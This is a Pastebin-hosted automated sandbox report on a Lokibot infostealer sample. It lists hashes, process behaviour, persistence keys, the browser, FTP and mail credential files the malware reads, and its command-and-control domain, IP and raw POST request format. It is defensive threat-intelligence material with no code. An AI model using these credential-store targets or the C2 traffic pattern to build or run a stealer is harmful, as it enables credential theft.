Advertisement
paladin316

Loki_b37757dbd6fa9323b4e5c7105f5b3ffd_exe_2019-07-22_08_30.txt

Jul 22nd, 2019
1,739
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.96 KB | None | 0 0
  1.  
  2. * MalFamily: "Lokibot"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe"
  7. * File Size: 866197
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "c2a18bb0f191117275ed69b0c35312171ec6bd981d765ca12bd84636aac2c5a2"
  10. * MD5: "b37757dbd6fa9323b4e5c7105f5b3ffd"
  11. * SHA1: "3497b0a22db380f04f48e2e588a08e5971813f6f"
  12. * SHA512: "8b0ba88a89079e20a512dc088b9e55398fcc22686dd3b7c740e3cb533a24485019599a374e6d9573038353be5ca357eb2ee8919f038c1104d161c6ccb922e7fd"
  13. * CRC32: "36994C9B"
  14. * SSDEEP: "24576:0k6+c2dm2AwylMll2CSKj9jkqjsW1H7dex+3wwy3:0bHdMll2Aj9jkqwK7dl3e"
  15.  
  16. * Process Execution:
  17. "Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe",
  18. "dydtgpjcc.exe",
  19. "dydtgpjcc.exe",
  20. "services.exe",
  21. "lsass.exe",
  22. "taskhost.exe",
  23. "sc.exe",
  24. "svchost.exe",
  25. "svchost.exe",
  26. "WerFault.exe",
  27. "wermgr.exe"
  28.  
  29.  
  30. * Executed Commands:
  31. "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgpjcc.exe ",
  32. "C:\\Windows\\system32\\lsass.exe",
  33. "taskhost.exe $(Arg0)",
  34. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  35. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  36. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  37. "C:\\Windows\\system32\\WerFault.exe -u -p 2328 -s 288",
  38. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\""
  39.  
  40.  
  41. * Signatures Detected:
  42.  
  43. "Description": "At least one process apparently crashed during execution",
  44. "Details":
  45.  
  46.  
  47. "Description": "Creates RWX memory",
  48. "Details":
  49.  
  50.  
  51. "Description": "A process attempted to delay the analysis task.",
  52. "Details":
  53.  
  54. "Process": "dydtgpjcc.exe tried to sleep 1348 seconds, actually delayed analysis time by 0 seconds"
  55.  
  56.  
  57.  
  58.  
  59. "Description": "Reads data out of its own binary image",
  60. "Details":
  61.  
  62. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00000000, length: 0x00000007"
  63.  
  64.  
  65. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00000000, length: 0x00002000"
  66.  
  67.  
  68. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00000007, length: 0x000d378e"
  69.  
  70.  
  71. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00001ff0, length: 0x00002000"
  72.  
  73.  
  74. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00003fe0, length: 0x00002000"
  75.  
  76.  
  77. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00005fd0, length: 0x00002000"
  78.  
  79.  
  80. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00007fc0, length: 0x00002000"
  81.  
  82.  
  83. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00009fb0, length: 0x00002000"
  84.  
  85.  
  86. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0000bfa0, length: 0x00002000"
  87.  
  88.  
  89. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0000df90, length: 0x00002000"
  90.  
  91.  
  92. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0000ff80, length: 0x00002000"
  93.  
  94.  
  95. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00011f70, length: 0x00002000"
  96.  
  97.  
  98. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00013f60, length: 0x00002000"
  99.  
  100.  
  101. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00015f50, length: 0x00002000"
  102.  
  103.  
  104. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00017f40, length: 0x00002000"
  105.  
  106.  
  107. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00019f30, length: 0x00002000"
  108.  
  109.  
  110. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0001bf20, length: 0x00002000"
  111.  
  112.  
  113. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0001df10, length: 0x00002000"
  114.  
  115.  
  116. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0001ff00, length: 0x00002000"
  117.  
  118.  
  119. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00021ef0, length: 0x00002000"
  120.  
  121.  
  122. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00023ee0, length: 0x00002000"
  123.  
  124.  
  125. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00025ed0, length: 0x00002000"
  126.  
  127.  
  128. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00027ec0, length: 0x00002000"
  129.  
  130.  
  131. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00029eb0, length: 0x00002000"
  132.  
  133.  
  134. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0002bea0, length: 0x00002000"
  135.  
  136.  
  137. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0002de90, length: 0x00002000"
  138.  
  139.  
  140. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0002fe80, length: 0x00002000"
  141.  
  142.  
  143. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00031e70, length: 0x00002000"
  144.  
  145.  
  146. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00033e60, length: 0x00002000"
  147.  
  148.  
  149. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00035e50, length: 0x00002000"
  150.  
  151.  
  152. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00037e40, length: 0x00002000"
  153.  
  154.  
  155. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00039e30, length: 0x00002000"
  156.  
  157.  
  158. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0003be20, length: 0x00002000"
  159.  
  160.  
  161. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0003de10, length: 0x00002000"
  162.  
  163.  
  164. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0003fe00, length: 0x00002000"
  165.  
  166.  
  167. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00041df0, length: 0x00002000"
  168.  
  169.  
  170. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00043de0, length: 0x00002000"
  171.  
  172.  
  173. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00045dd0, length: 0x00002000"
  174.  
  175.  
  176. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00047dc0, length: 0x00002000"
  177.  
  178.  
  179. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00049800, length: 0x00000031"
  180.  
  181.  
  182. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00049819, length: 0x00089f03"
  183.  
  184.  
  185. "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x000d378d, length: 0x00000008"
  186.  
  187.  
  188. "self_read": "process: dydtgpjcc.exe, pid: 1736, offset: 0x00000000, length: 0x0007a000"
  189.  
  190.  
  191.  
  192.  
  193. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  194. "Details":
  195.  
  196. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  197.  
  198.  
  199. "http_version_old": "HTTP traffic uses version 1.0"
  200.  
  201.  
  202. "suspicious_request": "http://erxst.info/hero/five/fre.php"
  203.  
  204.  
  205.  
  206.  
  207. "Description": "Performs some HTTP requests",
  208. "Details":
  209.  
  210. "url": "http://erxst.info/hero/five/fre.php"
  211.  
  212.  
  213.  
  214.  
  215. "Description": "Executed a process and injected code into it, probably while unpacking",
  216. "Details":
  217.  
  218. "Injection": "dydtgpjcc.exe(1736) -> dydtgpjcc.exe(3008)"
  219.  
  220.  
  221.  
  222.  
  223. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  224. "Details":
  225.  
  226. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13521331 times"
  227.  
  228.  
  229.  
  230.  
  231. "Description": "Steals private information from local Internet browsers",
  232. "Details":
  233.  
  234. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  235.  
  236.  
  237.  
  238.  
  239. "Description": "Installs itself for autorun at Windows startup",
  240. "Details":
  241.  
  242. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\dydtgp"
  243.  
  244.  
  245. "data": "C:\\Users\\user\\AppData\\Local\\dydtgp\\dydtgpnak.vbs"
  246.  
  247.  
  248.  
  249.  
  250. "Description": "Creates a hidden or system file",
  251. "Details":
  252.  
  253. "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  254.  
  255.  
  256. "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
  257.  
  258.  
  259.  
  260.  
  261. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  262. "Details":
  263.  
  264.  
  265. "Description": "Harvests credentials from local FTP client softwares",
  266. "Details":
  267.  
  268. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
  269.  
  270.  
  271. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  272.  
  273.  
  274. "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
  275.  
  276.  
  277. "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
  278.  
  279.  
  280. "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
  281.  
  282.  
  283. "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
  284.  
  285.  
  286. "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
  287.  
  288.  
  289. "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
  290.  
  291.  
  292. "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
  293.  
  294.  
  295. "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
  296.  
  297.  
  298.  
  299.  
  300. "Description": "Harvests information related to installed instant messenger clients",
  301. "Details":
  302.  
  303. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  304.  
  305.  
  306.  
  307.  
  308. "Description": "Harvests information related to installed mail clients",
  309. "Details":
  310.  
  311. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  312.  
  313.  
  314. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
  315.  
  316.  
  317. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  318.  
  319.  
  320. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  321.  
  322.  
  323. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
  324.  
  325.  
  326. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
  327.  
  328.  
  329. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  330.  
  331.  
  332. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  333.  
  334.  
  335. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  336.  
  337.  
  338. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
  339.  
  340.  
  341. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
  342.  
  343.  
  344. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  345.  
  346.  
  347. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  348.  
  349.  
  350. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  351.  
  352.  
  353. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
  354.  
  355.  
  356. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  357.  
  358.  
  359. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
  360.  
  361.  
  362. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
  363.  
  364.  
  365. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
  366.  
  367.  
  368. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
  369.  
  370.  
  371. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  372.  
  373.  
  374. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  375.  
  376.  
  377. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  378.  
  379.  
  380. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  381.  
  382.  
  383. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
  384.  
  385.  
  386. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  387.  
  388.  
  389. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  390.  
  391.  
  392. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
  393.  
  394.  
  395. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
  396.  
  397.  
  398. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  399.  
  400.  
  401. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  402.  
  403.  
  404. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  405.  
  406.  
  407. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  408.  
  409.  
  410. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  411.  
  412.  
  413. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
  414.  
  415.  
  416.  
  417.  
  418. "Description": "Collects information to fingerprint the system",
  419. "Details":
  420.  
  421.  
  422. "Description": "Created network traffic indicative of malicious activity",
  423. "Details":
  424.  
  425. "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
  426.  
  427.  
  428. "signature": "ET TROJAN LokiBot Fake 404 Response"
  429.  
  430.  
  431. "signature": "ET TROJAN LokiBot Checkin"
  432.  
  433.  
  434. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
  435.  
  436.  
  437. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
  438.  
  439.  
  440. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
  441.  
  442.  
  443. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
  444.  
  445.  
  446.  
  447.  
  448.  
  449. * Started Service:
  450. "VaultSvc",
  451. "WerSvc",
  452. "W32Time"
  453.  
  454.  
  455. * Mutexes:
  456. "DefaultTabtip-MainUI",
  457. "CicLoadWinStaWinSta0",
  458. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  459. "6EFA73A4746045B65DEE781E",
  460. "Local\\WERReportingForProcess2328",
  461. "Global\\\\xe5\\x88\\x90\\xc2\\x94",
  462. "Global\\\\xed\\x95\\xb0\\xc7\\xa8",
  463. "WERUI_BEX64-928a3992b7bed7284823981773aca329ad5b54d"
  464.  
  465.  
  466. * Modified Files:
  467. "C:\\Users\\user\\AppData\\Local\\Temp\\__tmp_rar_sfx_access_check_9902578",
  468. "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgpjcc.exe",
  469. "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgp.bmp",
  470. "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgp.ocx",
  471. "C:\\Users\\user\\AppData\\Roaming\\dydtgpdydtgp\\dydtgpeyp.exe",
  472. "C:\\Users\\user\\AppData\\Local\\dydtgp\\dydtgp.bmp",
  473. "C:\\Users\\user\\AppData\\Local\\dydtgp\\dydtgpdoh.vbs",
  474. "C:\\Users\\user\\AppData\\Local\\dydtgp\\dydtgpnak.vbs",
  475. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  476. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
  477. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  478. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  479. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4cbf3d1d-5feb-4971-b977-59608b4dcace",
  480. "\\??\\PIPE\\lsarpc",
  481. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA0C7.tmp.appcompat.txt",
  482. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA3E4.tmp.WERInternalMetadata.xml",
  483. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA405.tmp.hdmp",
  484. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9C2.tmp.mdmp",
  485. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\WERA0C7.tmp.appcompat.txt",
  486. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\WERA3E4.tmp.WERInternalMetadata.xml",
  487. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\WERA405.tmp.hdmp",
  488. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\WERA9C2.tmp.mdmp",
  489. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\Report.wer",
  490. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\Report.wer.tmp"
  491.  
  492.  
  493. * Deleted Files:
  494. "C:\\Users\\user\\AppData\\Local\\Temp\\__tmp_rar_sfx_access_check_9902578",
  495. "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgp.ocx",
  496. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  497. "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgpjcc.exe",
  498. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA0C7.tmp",
  499. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA0C7.tmp.appcompat.txt",
  500. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA3E4.tmp",
  501. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA3E4.tmp.WERInternalMetadata.xml",
  502. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA405.tmp",
  503. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA405.tmp.hdmp",
  504. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9C2.tmp",
  505. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9C2.tmp.mdmp",
  506. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\Report.wer.tmp"
  507.  
  508.  
  509. * Modified Registry Keys:
  510. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\dydtgp",
  511. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  512. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  513. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  514. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  515. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  516.  
  517.  
  518. * Deleted Registry Keys:
  519.  
  520. * DNS Communications:
  521.  
  522. "type": "A",
  523. "request": "erxst.info",
  524. "answers":
  525.  
  526. "data": "47.254.215.29",
  527. "type": "A"
  528.  
  529.  
  530.  
  531.  
  532.  
  533. * Domains:
  534.  
  535. "ip": "47.254.215.29",
  536. "domain": "erxst.info"
  537.  
  538.  
  539.  
  540. * Network Communication - ICMP:
  541.  
  542. * Network Communication - HTTP:
  543.  
  544. "count": 2,
  545. "body": "",
  546. "uri": "http://erxst.info/hero/five/fre.php",
  547. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  548. "method": "POST",
  549. "host": "erxst.info",
  550. "version": "1.0",
  551. "path": "/hero/five/fre.php",
  552. "data": "POST /hero/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: erxst.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 299C98FE\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
  553. "port": 80
  554.  
  555.  
  556. "count": 22,
  557. "body": "",
  558. "uri": "http://erxst.info/hero/five/fre.php",
  559. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  560. "method": "POST",
  561. "host": "erxst.info",
  562. "version": "1.0",
  563. "path": "/hero/five/fre.php",
  564. "data": "POST /hero/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: erxst.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 299C98FE\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
  565. "port": 80
  566.  
  567.  
  568.  
  569. * Network Communication - SMTP:
  570.  
  571. * Network Communication - Hosts:
  572.  
  573. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement